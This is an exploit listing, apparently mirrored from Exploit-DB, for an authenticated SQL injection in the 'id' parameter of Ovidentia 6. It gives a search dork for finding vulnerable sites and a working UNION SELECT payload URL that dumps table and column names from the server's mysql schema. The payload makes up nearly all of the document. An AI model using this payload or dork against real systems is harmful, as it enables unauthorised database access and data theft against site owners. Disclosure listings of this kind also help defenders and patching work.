Ovidentia 6 – ‘id’ SQL injection (Authenticated)

  • 作者: Felipe Prates Donato
    日期: 2021-03-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49707/
  • # Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
    # Exploit Author: Felipe Prates Donato (m4ud)
    # Vendor Homepage: http://www.ovidentia.org
    # Version: 6
    # DORK : "Powered by Ovidentia"
    
    http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--